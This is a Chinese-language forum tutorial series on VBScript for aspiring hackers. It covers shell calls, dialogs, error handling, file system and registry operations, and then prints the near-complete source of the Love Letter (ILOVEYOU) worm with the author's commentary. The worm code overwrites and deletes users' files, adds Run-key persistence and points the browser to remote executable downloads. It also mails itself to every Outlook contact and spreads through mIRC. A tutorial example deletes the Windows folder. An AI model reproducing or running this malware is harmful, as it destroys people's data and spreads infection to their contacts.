論壇上好多朋友都問關于腳本的問題,正好最近對腳本比較有興趣,就寫點東西吧。首先說明一下,我的所有代碼都是vbscript,jscript我沒有研究過,不過我想也差不多。
關于最基礎的語法比如變量的申明,分支,循環,函數的調用,等等這些我就不講了,不懂得自己看一下。
1、我們的第一個vbs程序:還是那個老得掉牙的冬冬。
************************hello.vbs**************************
dim hello
hello=”hello world!”
wscript.echo hello
wscript echo “ this is my first vbs”
可以看出wscript.echo有兩種用法,這個不難。
可以直接雙擊運行,可以在當前目錄的命令行輸入:
cscript hello.vbs
2、在腳本中調用其他的程序:
使用run()方法,在使用前必須先建立shell的實例
********************shell.vbs******************************************
set ws=wscript.createobject("wscript.shell")
ret=ws.run ("notepad" ,3,true)
if ret=0 then
wscript.echo “succeed!”
else
wscript.echo “there is a error,the error number is:”
wscript.echo cstr(ret)
end if
***************************************************************************
這里run 有三個參數,第一個參數是你要執行的程序的路徑
第二個程序是窗口的形式,0是在后臺運行;
1表示正常運行
2表示激活程序并且顯示為最小化
3表示激活程序并且顯示為最大化
一共有10個這樣的參數我只列出了4個最常用的。
第三個參數是表示這個腳本是等待還是繼續執行,如果設為了true,腳本就會等待調用的程序退出后再向后執行。
注意到沒有,我在run的前面還有一個接受返回值的變量,一般來說如果返回為0,表示成功執行,如果不為0,則這個返回值就是錯誤代碼,可以通過這個代碼找出相應的錯誤。
3、inputbox 和msgbox
會vb的人對著兩個東西應該很熟悉,用法也沒什么差別
input=inputbox(“please enter you password”,”passwd”)
if input<>”1234”
then
msgbox “you enter a wrong passwd”
end if
當然你也可以給msgbox添加按鈕,用一個變量接受用戶的選擇
例如:ret=msgbox “continue?”,vbyesnocancel
返回值和常量對照如下:
vbok 1
vbcancel 2
vbabort 3
vbretry 4
vbignore 5
vbyes 6
vbno 7
4、錯誤處理
何vb一樣用on error resume next
這個沒什么好說的,如果遇到了錯誤就跳過繼續執行下一句
當然這個方法很弱智,還需要有一個方法,vbscript提供了一個對象err對象
他有兩個方法clear,raise
5個屬性:description,helpcontext ,helpfile,number,source
我們可以利用err.number獲得錯誤號例如
***********************err.vbs*****************************
on error resume next
a=11
b=0
c=a/b
if err.number<>0 then
wscript.echo err.number & err.description & err.source
end if
我們可以用err.raisel來手工拋出錯誤
比如我們要產生一個path not found的錯誤 告訴用戶,他填寫的路徑不對
on error resume next
err.raise 76
msgbox "error :" & err.description
err.clear
以上都是基礎,今天就寫到這里吧,好累哦,呵呵呵 如有轉載注明出處。明天給大家講文件系統吧。
vbscript腳本編程教程2
by sssa2000
7/7/2004
我們來看一看怎么利用fso來進行文件操作。Fso時vbs里進行文件操作的核心。作為黑客,不管學習什么語言,對文件的操作都應該是要了如指掌的,所以請大家仔細學習。
不說廢話,先看fso由哪幾個對象組成:
drive對象:包含儲存設備的信息,包括硬盤,光驅,ram盤,網絡驅動器
drives集合:提供一個物理和邏輯驅動器的列表
file 對象:檢查和處理文件
files 集合:提供一個文件夾中的文件列表
folder對象:檢查和處理文件夾
folders集合:提供文件夾中子文件夾的列表
textstream對象:讀寫文本文件
看看fso的方法:由于很多,所以我不會把每個的作用寫出來,如果有不懂的,自己查一下msdn。不要說沒有哦
bulidpath:把文件路徑信息添加到現有的文件路徑上
copyfile
copyfolder
createfolder
createtextfile
deletefile
deletefolder
dreveexits
fileexits
folderexists
getabsolutepathname:返回一個文件夾或文件的絕對路徑
getbasename:返回一個文件或文件夾的基本路徑
getdrive:返回一個dreve對象
getdrivename:返回一個驅動器的名字
getextensionname:返回擴展名
getfile:返回一個file對象
getfilename:返回文件夾中文件名稱
getfolder
getparentfoldername:返回一個文件夾的父文件夾
getspecialfolder:返回指向一個特殊文件夾的對象指針
gettempname:返回一個可以被createtextfile使用的隨機產生的文件或文件夾的名稱
movefile
movefolder
opentextfile
好了,看到這里我想大家也明白了一大半,可能后面都不用我多說了,腳本就是這么簡單,呵呵呵,還是繼續把。
1、使用fso
由于fso不是wsh的一部分,所以我們需要建立他的模型
例如set fs=wscript.createobject(“scripting.filesystemobject”)
這樣就建立了fso的模型。如果要釋放的話也很簡單,set fs=nothing
2、使用文件夾
創建:
在創建前我們需要檢查是否存在,看一下程序
***************************createfolder.vbs*****************************
dim fs,s
set fs=wscript.createobject(“scripting.filesystemobject”)
if (fs.folderexists(“c:/temp”)) then
s=”is available”
else
s=”not exist”
set foldr=fs.createfolder(“c:/temp”)
end if
刪除、拷貝、移動
刪除:
set fs=wscript.createobject(“scripting.filesystemobject”)
fs.deletefolder(“c:/windows”)
拷貝:
set fs=wscript.createobject(“scripting.filesystemobject”)
fs.copyfolder “c:/data” “d:/data”
注意,如果這個時候c:/data 和d:/data都存在,會出錯,復制也就會停止,如果要強制覆蓋,使用fs.copyfolder “c:/data” “d:/data”,true
移動
set fs=wscript.createobject(“scripting.filesystemobject”)
fs.movefolder “c:/data” “d:/data”
關于通配符:
我們可以使用統配符,來方便操作:
例如, fs.movefolder :c:/data/te*” , “d:/working”
注意到沒有,我在目的路徑最后沒有使用“/” 也就是說我沒有這樣寫:
fs.movefolder :c:/data/te*” , “d:/working/”
這樣寫的話,如果d:/working 目錄不存在,windows就不會為我們自動創建這個目錄。
還有一點,大家注意到沒有 上面說的都沒有涉及到folder對象,我們都是在利用fso提供的方法,當然利用folder一樣可以的:
set fs= wscript.createobject(“scripting.filesystemobject”)
set f=fs.getfolder(“c:/data”)
f.delete ‘刪除。如果有子目錄,也會被刪除
f.copy “d:/working”,true ‘拷貝到d:/working
f.move :”d:/temp” ‘移動到d:/temp
特殊文件夾
一般指的就是系統文件夾:/windows/system32, 臨時文件夾,windows文件夾
看下面,我們使用環境變量來獲得windows目錄,關于環境變量我們會在后面詳細講道,如果我忘記了 請大家提醒我
set fs=wscript.createobject(“scripting.filesystemobject”)
set wshshell=wscript.createobject(“wscript.shell”)
osdir=wshshell.expandenvironmentstrings(“%systemroot%”)
set f =fs.getfolder(osdir)
wscript.echo f
當然,還有簡單的方法 那就是使用getspecialfolder()
這個方法使用3種值:
0 表示windows文件夾,相關常量是windowsfolder
1 系統文件夾,相關常量是systemfolder
2 臨時目錄,相關常量temporaryfolder
看下面的例子:
***********************************getspecialfolder***************************
set fs=wscript.createobject(“scripting.filesystemobject”)
set wfolder=fs.getspecialfolder(0) ‘返回windows目錄
set wfolder=fs.getspecialfolder(1) ‘返回system32/
set wfolder=fs.getspecialfolder(2)'返回臨時目錄
3、使用文件
使用文件屬性:
文件夾的屬性我沒有說,大家可以從文件屬性里舉一反三
文件屬性常用的就是:
normal 0
readonly 1
hideen 2
system 4
set fs=wscript.createobject(“scripting.filesystemobject”)
set f=fs.gerfile(“d:/index.txt”)
f.attributes=f.attributes+1
這里由于不知道d:/index.txt的文件屬性,所以會發生不可預測的結果,如果文件的屬性是0,那么就會變成1。所以最好在改變屬性前查詢
創建
創建前需要檢查文件是否存在,方法和前面說的文件夾的方法一樣
*****************************file.vbs**********************************
set fs=wscript.createobject(“scripting.filesystemobject”)
if fs.fileexists(“c:/asd.txt”) then
s=” available”
else
s=not exist”
set f=fs.createtextfile(“c:/asd.txt”)
end if
當然 我們也可以使用set f=fs.createtextfile(“c:/asd.txt”,true)
來強制覆蓋已存在的文件。
復制移動刪除文件
和文件夾一樣 我們既可以使用fso提供的方法也可以用file對象
set fs=wscript.createobject(“scripting.filesystemobject”)
fs.copyfile “c:/asd.txt”,”d:/1/asd.txt”,true ‘復制文件,如果已存在就強制覆蓋
fs.movefile “c:/asd.txt”, “d:/” ‘移動
fs.deletefile “c:/asd.txt” ‘刪除
好了,下一章我們就要學習文件的讀寫了,文件的讀寫是文件系統,尤其是黑客編程里面十分重要的一部分,今天打字可能有很多錯誤,大家看的時候仔細一點,不懂得多看看msdn, 要提高水平只有靠自己,別人是幫不了你的
Vbscript 腳本編程3 關于文件的讀寫
By sssa2000
7/9/2004
使用vbscript來讀寫文件,十分的方便,廢話少說,切入正題。
1、打開文件
使用opentextfile方法
set fs =createobject(“scripting.filesystemobject”)
set ts=fs.opentextfile(“c:/1.txt”,1,true)
注意這里需要填入文件的完整路徑,后面一個參數為訪問模式
1為forreading
2為forwriting
8為appending
第三個參數指定如果指定文件不存在,是否創建。
2、讀取文件
讀取文件的方法有三個
read(x)讀取x個字符
readline讀取一行
readall全部讀取
例如:
set fs =createobject(“scripting.filesystemobject”)
set ts=fs.opentextfile(“c:/1.txt”,1,true)
value=ts.read(20)
line=ts.readline
contents=ts.readall
這里還要介紹幾個指針變量:
textstream對象的atendofstream屬性。當處于文件結尾的時候這個屬性返回true.我們可以用循環檢測又沒有到達文件末尾。例如:
set fs =createobject(“scripting.filesystemobject”)
set f=fs.getfile(“c:/1.txt”,1,false)
set ts=f.openastextstream(1,0)
do while ts.atendofstream<>true
f.read(1)
loop
還有一個屬性,atendofline,如果已經到了行末尾,這個屬性返回true.
Textstream對象還有兩個有用的屬性,column和line.
在打開一個文件后,行和列指針都被設置為1。
看一個綜合的例子吧:
*******************************read.vbs******************************
set fs =createobject(“scripting.filesystemobject”)
set f=fs.opentextfile(“c:/1.txt”,1,true)
do while f.atendofstream<>true
data=””
for a=1 to 5
if f.atendofstream<>true then
data=data+f.readline
end if
next
dataset=dataset+1
wscript.echo “data set” &dataset & ”:” & data
loop
最后說一下在文件中跳行
skip(x) 跳過x個字符
skipline 跳過一行
用法也很簡單 和前面一樣,就不說了。
3、寫文件
可以用forwriting和forappending方式來寫
寫有3各方法:
write(x)
writeline
writeblanklines(n) 寫入n個空行
來看一個例子:
*****************************************************************
data=”hello, I like script programing”
set fs =createobject(“scripting.filesystemobject”)
if (fs.fileexists(“c:/2.txt”)) then
set f =fs.opentextfile(“c:/2.txt”,8)
f.write data
f.writeline data
f.close
else
set f=fs.opentextfile(“c:/2.txt”,2, true)
f.writeblanklines 2
f.write data
f.close
end if
注意 寫完文件以后一定要關閉?。。。。。?! 還有就是,如果要讀文件又要寫文件,讀完之后一定也要記得關閉,這樣才能以寫的方式打開。
好了 關于文件都說完了,實際運用中還有可能牽扯到關于字符串的操作。
后面的1章里面,我打算寫一點驅動器和注冊表的內容,腳本編程內容也很豐富,我也只講關于黑客方面的。今天好累啊,還有就是請大家不要在論壇灌水了,我每天都刪貼,這樣也不好,論壇是大家的,我每天寫一些原創的東西也就是為了讓我們的論壇和別的論壇有些不同,我一個人力量有限,還要靠大家的力量,我打算在論壇上找幾個人一論壇的名義一起編個軟件,這樣我們的論壇也算有點名聲。
很晚了,休息了。
#########################################################################################################################
Vbscript編程5
注冊表,修改注冊表是編程的一個基本技能,腳本編程當然也不例外。
這里,我就不再講解注冊表的基本結構。
1、讀注冊表的關鍵詞和值:
可以通過把關鍵詞的完整路徑傳遞給wshshell對象的regread方法
例如:
set ws=wscript.createobject("wscript.shell")
v=ws.regread("HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/nwiz")
wscript.echo v
2、寫注冊表
有讀就有寫了,使用wshshell對象的regwrite方法
看例子:
path="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/"
set ws=wscript.createobject("wscript.shell")
t=ws.regwrite(path & "jj","hello")
這樣就把
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/jj這個鍵值改成了hello.不過要注意:這個鍵值一定要預先存在。
如果要創建一個新的關鍵詞,同樣也是用這個方法。
path="HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/run/sssa2000/love/"
set ws=wscript.createobject("wscript.shell")
val=ws.regwrite(path,"nenboy")
val=ws.regread(path)
wscript.echo val
刪除關鍵字和值
使用regdelete方法,把完整的路徑傳遞給regdelete就可以了
例如
val=ws.regdel(path)
注意,如果要刪除關鍵詞的值的話 一定要在路徑最后加上“/”,如果不加斜線,就會刪除整個關鍵詞。
好了 ,最基本的腳本編程也就講完了,其實腳本編寫也很簡單,你們看看下面這個曾經很出名的 Love Letter病毒的源代碼, 除了郵件那部分我沒講,其他的都是一目了然吧?
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philip
pines
' 注釋:程序作者的簽名(可能)
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
' 注釋:FileSystemObject是M$ VBVM系統中最危險的部分,它的功能十分強大
' 從病毒使用FSO可以知道,通過修改注冊表,可以輕易防止 Love Letter發作。
set file = fso.OpenTextFile(WScript.ScriptFullname,1) '返回當前腳本的完整路徑
vbscopy=file.ReadAll
main()
' 注釋 - 程序初始化完成。
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER/Software/Microsoft/Windows Scriptin
g Host/Settings/Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/Windows Scripting
Host/Settings/Timeout",0,"REG_DWORD"
' 注釋 - 防止操作超時造成的程序終止。
' 應該說,編寫病毒的程序員考慮到了可能發生的問題,這一點值得所有的編程
者借鑒。
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
' 獲取系統關鍵文件夾的名稱
' VB編程時可以用。
Set c = fso.GetFile(WScript.ScriptFullName) '返回當前腳本的完整路徑
c.Copy(dirsystem&"/MSKernel32.vbs") 'Copies a specified file or folder from one location to another.
c.Copy(dirwin&"/Win32DLL.vbs")
c.Copy(dirsystem&"/LOVE-LETTER-FOR-YOU.TXT.vbs")
' 復制自身到關鍵目錄中備用。
' 文件名并不是很好。太容易被發現了。
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
' 修改注冊表,以便自動裝載病毒程序
' 預防:經常檢查注冊表中的這一分支。
' 已知的方法還有把HTA放入Startup文件夾。病毒程序使用的方法更先進,
' 因為它不會因為語言問題而失效。
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersio
n/Run/MSKernel32",dirsystem&"/MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersio
n/RunServices/Win32DLL",dirwin&"/Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER/Software/Microsoft/Internet Explore
r/Download Directory")
if (downread="") then
downread="c:/"
end if
if (fileexist(dirsystem&"/WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page",
"http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page",
"http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page",
"http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU/Software/Microsoft/Internet Explorer/Main/Start Page",
"http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B
UGSFIX.exe"
end if
end if
if (fileexist(downread&"/WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersio
n/Run/WIN-BUGSFIX",downread&"/WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main
/Start Page","about:blank"
end if
end sub
sub folderlist(folderspec)
' 遍歷文件夾
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders '得到某一特定文件夾的所有子文件夾,包括系統隱藏文件夾
for each f1 in sf 'f1為每一個子文件夾的對象
infectfiles(f1.path) '傳染文件的操作
folderlist(f1.path) '再次進行文件夾遍歷
next
end sub
sub listadriv
' 遍歷所有驅動器。
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then '2.3分別為硬盤和網絡共享盤
folderlist(d.path&"/")
end if
Next
listadriv = s
end sub
function fileexist(filespec)
' 判斷文件是否存在
' 純粹從技術角度講,這段程序寫的不怎么樣。
' 不用寫這么長就能夠實現相同的功能
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
' 判斷文件夾是否存在
' 和上一段程序一樣臭。
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub infectfiles(folderspec)
' 執行傳染文件的操作。
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files '得到某一特定文件夾的所有文件,包括系統隱藏文件
for each f1 in fc
ext=fso.GetExtensionName(f1.path) '得到擴展名
ext=lcase(ext) '轉變為小寫
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy 'vbscopy=file.ReadAll
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext=
"sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"/"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="scri
pt.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"/script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corru
pt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
' 病毒作者的英文恐怕沒學好……不過,這樣嚇唬人也夠損的了。
' 這里提醒各位注意,不要在乎那些嚇人的文字,仔細觀察就會發現漏洞其實不
少。
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"/LOVE-LETTER-FO
R-YOU.HTM"
scriptini.WriteLine "n3=}"
' 注意,這樣做的結果是,MIRC也能夠傳染病毒。
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub regcreate(regkey,regvalue)
' 修改注冊表(創建鍵值)
' 這個程序似乎是微軟的示范程序。
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
' 這個程序似乎也是微軟的示范程序。(WSH示范,在Windows文件夾)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
sub spreadtoemail()
' 通過電子郵件擴散
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
' 病毒的局限:只支持Outlook,而Outlook Express則不支持。
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER/Software/Microsoft/WAB/"&male
ad)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
' 病毒得名的原因
' 見到這樣的郵件,肯定是病毒。
' 頭腦正常的人恐怕不會這樣直白的。
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from m
e."
male.Attachments.Add(dirsystem&"/LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&malead,1,
"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a,a.Addre
ssEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER/Software/Microsoft/WAB/"&a,a.Addre
ssEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
' 從技術角度說,這段程序寫得很漂亮,原因在于充分地利用了 Outlook 的資源
' 值得編寫程序的借鑒。
' 程序中間的_符號是連接線,所以注釋寫在這里。
' 程序中無效語句很多,浪費了不少空間。
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Gene
rator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @G
RAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is go
od...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LO
VE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YO
U.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@
>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to r
ead this HTML file<BR>- Please press #-#YES#-# button to Enable Active
X<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>--------
--z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight
;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf&
_
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf
& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf&
_
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windo
ws^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.v
bs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"/")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"/")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"/",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"/LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"/LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
